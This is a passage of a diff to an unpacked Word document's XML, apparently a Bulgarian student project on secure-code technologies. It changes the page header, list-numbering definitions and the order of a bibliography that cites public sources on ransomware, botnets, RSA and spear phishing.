+        <w:right w:val="nil"/>
+        <w:between w:val="nil"/>
+      </w:pBdr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4536"/>
+        <w:tab w:val="right" w:pos="9072"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      <w:jc w:val="right"/>
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+        <w:color w:val="000000"/>
+        <w:sz w:val="14"/>
+        <w:szCs w:val="14"/>
+      </w:rPr>
+    </w:pPr>
+    <w:r>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        <w:noProof/>
+      </w:rPr>
+      <w:drawing>
+        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="74FE1878" wp14:editId="52FD979F">
+          <wp:simplePos x="0" y="0"/>
+          <wp:positionH relativeFrom="leftMargin">
+            <wp:align>right</wp:align>
+          </wp:positionH>
+          <wp:positionV relativeFrom="paragraph">
+            <wp:posOffset>6360</wp:posOffset>
+          </wp:positionV>
+          <wp:extent cx="299286" cy="300251"/>
+          <wp:effectExtent l="0" t="0" r="5715" b="5080"/>
+          <wp:wrapNone/>
+          <wp:docPr id="1394215584" name="Picture 1394215584"/>
+          <wp:cNvGraphicFramePr/>
+          <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+              <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:nvPicPr>
+                  <pic:cNvPr id="0" name="image1.jpg"/>
+                  <pic:cNvPicPr preferRelativeResize="0"/>
+                </pic:nvPicPr>
+                <pic:blipFill>
+                  <a:blip r:embed="rId1"/>
+                  <a:srcRect/>
+                  <a:stretch>
+                    <a:fillRect/>
+                  </a:stretch>
+                </pic:blipFill>
+                <pic:spPr>
+                  <a:xfrm>
+                    <a:off x="0" y="0"/>
+                    <a:ext cx="299286" cy="300251"/>
+                  </a:xfrm>
+                  <a:prstGeom prst="rect">
+                    <a:avLst/>
+                  </a:prstGeom>
+                  <a:ln/>
+                </pic:spPr>
+              </pic:pic>
+            </a:graphicData>
+          </a:graphic>
+          <wp14:sizeRelH relativeFrom="margin">
+            <wp14:pctWidth>0</wp14:pctWidth>
+          </wp14:sizeRelH>
+          <wp14:sizeRelV relativeFrom="margin">
+            <wp14:pctHeight>0</wp14:pctHeight>
+          </wp14:sizeRelV>
+        </wp:anchor>
+      </w:drawing>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="000000"/>
+        <w:sz w:val="14"/>
+        <w:szCs w:val="14"/>
+      </w:rPr>
+      <w:t xml:space="preserve">Проект по дисциплина </w:t>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="000000"/>
+        <w:sz w:val="14"/>
+        <w:szCs w:val="14"/>
+        <w:lang w:val="en-US"/>
+      </w:rPr>
+      <w:t>“</w:t>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="000000"/>
+        <w:sz w:val="14"/>
+        <w:szCs w:val="14"/>
+      </w:rPr>
+      <w:t>Програмни технологии за сигурен код</w:t>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="000000"/>
+        <w:sz w:val="14"/>
+        <w:szCs w:val="14"/>
+        <w:lang w:val="en-US"/>
+      </w:rPr>
+      <w:t>”</w:t>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="000000"/>
+        <w:sz w:val="14"/>
+        <w:szCs w:val="14"/>
+      </w:rPr>
+      <w:br/>
+      <w:t>2025-2026</w:t>
+    </w:r>
+  </w:p>
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="Header"/>
+    </w:pPr>
+  </w:p>
+</w:hdr>
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
@@ -5564,8 +7042,8 @@
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="02B218B7"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="5AACF5DC"/>
-    <w:lvl w:ilvl="0" w:tplc="0409000F">
+    <w:tmpl w:val="EF5E97C2"/>
+    <w:lvl w:ilvl="0" w:tplc="8812B07C">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val="%1."/>
@@ -5573,8 +7051,12 @@
       <w:pPr>
         <w:ind w:left="360" w:hanging="360"/>
       </w:pPr>
+      <w:rPr>
+        <w:sz w:val="24"/>
+        <w:szCs w:val="24"/>
+      </w:rPr>
     </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+    <w:lvl w:ilvl="1" w:tplc="04090019">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerLetter"/>
       <w:lvlText w:val="%2."/>
@@ -6025,6 +7507,232 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="6FD929C1"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="383A7A92"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="71FF1552"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="62A247CA"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6840" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7235233B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="82E8934C"/>
@@ -6123,10 +7831,16 @@
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="1113406297">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="6" w16cid:durableId="1349334172">
     <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="7" w16cid:durableId="1281380356">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="511453526">
+    <w:abstractNumId w:val="6"/>
   </w:num>
 </w:numbering>
 </file>
@@ -7477,151 +9191,6 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
-</file>
-
-<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
-<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
-  <documentManagement>
-    <_activity xmlns="16eb03e4-fe34-41e0-b148-6c2f228be8b6" xsi:nil="true"/>
-  </documentManagement>
-</p:properties>
-</file>
-
-<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
-<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\IEEE2006OfficeOnline.xsl" StyleName="IEEE" Version="2006">
-  <b:Source>
-    <b:Tag>Sto</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{2B4BF2B4-2B0E-46EC-8A46-8D9494091BBA}</b:Guid>
-    <b:Title>#StopRansomware Guide</b:Title>
-    <b:ProductionCompany>Americas Cyber Defense Agency</b:ProductionCompany>
-    <b:URL>https://www.cisa.gov/stopransomware/ransomware-guide</b:URL>
-    <b:RefOrder>1</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Ran</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{472FD183-EF2C-470D-A6D1-9E653F75936C}</b:Guid>
-    <b:Title>Ransomware </b:Title>
-    <b:ProductionCompany>FBI</b:ProductionCompany>
-    <b:URL>https://www.fbi.gov/how-we-can-help-you/scams-and-safety/common-frauds-and-scams/ransomware</b:URL>
-    <b:RefOrder>2</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Kur22</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{45B254F4-2ED7-4796-9145-8DA52FF7374D}</b:Guid>
-    <b:Author>
-      <b:Author>
-        <b:NameList>
-          <b:Person>
-            <b:Last>Baker</b:Last>
-            <b:First>Kurt</b:First>
-          </b:Person>
-        </b:NameList>
-      </b:Author>
-    </b:Author>
-    <b:Title>History of Ransomware</b:Title>
-    <b:ProductionCompany>CrowdStrike</b:ProductionCompany>
-    <b:Year>2022</b:Year>
-    <b:Month>10</b:Month>
-    <b:Day>09</b:Day>
-    <b:URL>https://www.crowdstrike.com/en-us/cybersecurity-101/ransomware/history-of-ransomware/</b:URL>
-    <b:RefOrder>3</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Bot</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{20B2E95D-A0FA-4944-85FB-E71D64664F65}</b:Guid>
-    <b:Title>Botnet</b:Title>
-    <b:ProductionCompany>Eset</b:ProductionCompany>
-    <b:URL>https://help.eset.com/glossary/bg-BG/botnet.html</b:URL>
-    <b:RefOrder>4</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>CCS</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{F37D6060-4B83-48F8-ADC6-94648278B6D6}</b:Guid>
-    <b:Title>CC Server</b:Title>
-    <b:ProductionCompany>Eset</b:ProductionCompany>
-    <b:URL>https://help.eset.com/glossary/bg-BG/cc_server.html</b:URL>
-    <b:RefOrder>5</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Фил20</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{D0ACEC89-B82E-4903-BDB0-FD382F8077D3}</b:Guid>
-    <b:Author>
-      <b:Author>
-        <b:NameList>
-          <b:Person>
-            <b:Last>Петров</b:Last>
-            <b:First>Филип</b:First>
-          </b:Person>
-        </b:NameList>
-      </b:Author>
-    </b:Author>
-    <b:Title>RSA</b:Title>
-    <b:Year>2020</b:Year>
-    <b:Month>02</b:Month>
-    <b:Day>16</b:Day>
-    <b:URL>https://www.cphpvb.net/network-security/10840-rsa-with-example/</b:URL>
-    <b:RefOrder>6</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Wha25</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{5B16835C-9C43-4285-BAF5-D4B2F3F24F90}</b:Guid>
-    <b:Title>What is RSA Asymmetric Encryption? How Does it Work?</b:Title>
-    <b:ProductionCompany>Secure W2</b:ProductionCompany>
-    <b:Year>2025</b:Year>
-    <b:Month>09</b:Month>
-    <b:Day>15</b:Day>
-    <b:URL>https://www.securew2.com/blog/what-is-rsa-asymmetric-encryption</b:URL>
-    <b:RefOrder>7</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>arc</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{B1A9D737-2102-49C1-98B1-5A289956686D}</b:Guid>
-    <b:Title>archiveus-trojan</b:Title>
-    <b:ProductionCompany>Knowbe4</b:ProductionCompany>
-    <b:URL>https://www.knowbe4.com/ransomware-knowledgebase/archiveus-trojan</b:URL>
-    <b:RefOrder>8</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Spe</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{AC188D98-B7F5-4E78-BC9F-61D0C37525B1}</b:Guid>
-    <b:Title>Spear phishing</b:Title>
-    <b:ProductionCompany>Ibm</b:ProductionCompany>
-    <b:URL>https://www.ibm.com/think/topics/spear-phishing</b:URL>
-    <b:Author>
-      <b:Author>
-        <b:Corporate>Matthew Kosinski</b:Corporate>
-      </b:Author>
-    </b:Author>
-    <b:RefOrder>9</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Gpc</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{327CB1AD-525D-4623-BC38-89F7CF280C15}</b:Guid>
-    <b:Title>Gpcode</b:Title>
-    <b:ProductionCompany>Knowbe4</b:ProductionCompany>
-    <b:URL>https://www.knowbe4.com/ransomware-knowledgebase/gpcode</b:URL>
-    <b:RefOrder>10</b:RefOrder>
-  </b:Source>
-</b:Sources>
-</file>
-
-<file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
 <ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Document" ma:contentTypeID="0x010100EA7F95447AE5CD4A96E24D58484FA3D2" ma:contentTypeVersion="9" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="152a1f3b266b5df558eb501d08fa54b7">
   <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="16eb03e4-fe34-41e0-b148-6c2f228be8b6" xmlns:ns4="c5dcd230-26b3-4f1e-a7d8-2c2a40be033b" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="ebbaa98d623378dfae11ad7cf338cc80" ns3:_="" ns4:_="">
     <xsd:import namespace="16eb03e4-fe34-41e0-b148-6c2f228be8b6"/>
@@ -7816,33 +9385,171 @@
 </ct:contentTypeSchema>
 </file>
 
-<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95434D9A-8BA9-420D-93D1-CF746F074EA1}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
+<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
 </file>
 
-<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6C2A65B6-C891-4DE3-96AA-342988F8CBF9}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
-    <ds:schemaRef ds:uri="16eb03e4-fe34-41e0-b148-6c2f228be8b6"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
+<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
+<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
+  <documentManagement>
+    <_activity xmlns="16eb03e4-fe34-41e0-b148-6c2f228be8b6" xsi:nil="true"/>
+  </documentManagement>
+</p:properties>
 </file>
 
-<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{9EC5290A-2DE6-49DB-A151-226064C42EFF}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
+<file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\IEEE2006OfficeOnline.xsl" StyleName="IEEE" Version="2006">
+  <b:Source>
+    <b:Tag>Sto</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{2B4BF2B4-2B0E-46EC-8A46-8D9494091BBA}</b:Guid>
+    <b:Title>#StopRansomware Guide</b:Title>
+    <b:ProductionCompany>Americas Cyber Defense Agency</b:ProductionCompany>
+    <b:URL>https://www.cisa.gov/stopransomware/ransomware-guide</b:URL>
+    <b:RefOrder>1</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Ran</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{472FD183-EF2C-470D-A6D1-9E653F75936C}</b:Guid>
+    <b:Title>Ransomware </b:Title>
+    <b:ProductionCompany>FBI</b:ProductionCompany>
+    <b:URL>https://www.fbi.gov/how-we-can-help-you/scams-and-safety/common-frauds-and-scams/ransomware</b:URL>
+    <b:RefOrder>2</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Kur22</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{45B254F4-2ED7-4796-9145-8DA52FF7374D}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:NameList>
+          <b:Person>
+            <b:Last>Baker</b:Last>
+            <b:First>Kurt</b:First>
+          </b:Person>
+        </b:NameList>
+      </b:Author>
+    </b:Author>
+    <b:Title>History of Ransomware</b:Title>
+    <b:ProductionCompany>CrowdStrike</b:ProductionCompany>
+    <b:Year>2022</b:Year>
+    <b:Month>10</b:Month>
+    <b:Day>09</b:Day>
+    <b:URL>https://www.crowdstrike.com/en-us/cybersecurity-101/ransomware/history-of-ransomware/</b:URL>
+    <b:RefOrder>3</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Bot</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{20B2E95D-A0FA-4944-85FB-E71D64664F65}</b:Guid>
+    <b:Title>Botnet</b:Title>
+    <b:ProductionCompany>Eset</b:ProductionCompany>
+    <b:URL>https://help.eset.com/glossary/bg-BG/botnet.html</b:URL>
+    <b:RefOrder>10</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>CCS</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{F37D6060-4B83-48F8-ADC6-94648278B6D6}</b:Guid>
+    <b:Title>CC Server</b:Title>
+    <b:ProductionCompany>Eset</b:ProductionCompany>
+    <b:URL>https://help.eset.com/glossary/bg-BG/cc_server.html</b:URL>
+    <b:RefOrder>11</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Фил20</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{D0ACEC89-B82E-4903-BDB0-FD382F8077D3}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:NameList>
+          <b:Person>
+            <b:Last>Петров</b:Last>
+            <b:First>Филип</b:First>
+          </b:Person>
+        </b:NameList>
+      </b:Author>
+    </b:Author>
+    <b:Title>RSA</b:Title>
+    <b:Year>2020</b:Year>
+    <b:Month>02</b:Month>
+    <b:Day>16</b:Day>
+    <b:URL>https://www.cphpvb.net/network-security/10840-rsa-with-example/</b:URL>
+    <b:RefOrder>5</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Wha25</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{5B16835C-9C43-4285-BAF5-D4B2F3F24F90}</b:Guid>
+    <b:Title>What is RSA Asymmetric Encryption? How Does it Work?</b:Title>
+    <b:ProductionCompany>Secure W2</b:ProductionCompany>
+    <b:Year>2025</b:Year>
+    <b:Month>09</b:Month>
+    <b:Day>15</b:Day>
+    <b:URL>https://www.securew2.com/blog/what-is-rsa-asymmetric-encryption</b:URL>
+    <b:RefOrder>6</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>arc</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{B1A9D737-2102-49C1-98B1-5A289956686D}</b:Guid>
+    <b:Title>archiveus-trojan</b:Title>
+    <b:ProductionCompany>Knowbe4</b:ProductionCompany>
+    <b:URL>https://www.knowbe4.com/ransomware-knowledgebase/archiveus-trojan</b:URL>
+    <b:RefOrder>4</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Spe</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{AC188D98-B7F5-4E78-BC9F-61D0C37525B1}</b:Guid>
+    <b:Title>Spear phishing</b:Title>
+    <b:ProductionCompany>Ibm</b:ProductionCompany>
+    <b:URL>https://www.ibm.com/think/topics/spear-phishing</b:URL>
+    <b:Author>
+      <b:Author>
+        <b:Corporate>Matthew Kosinski</b:Corporate>
+      </b:Author>
+    </b:Author>
+    <b:RefOrder>7</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Gpc</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
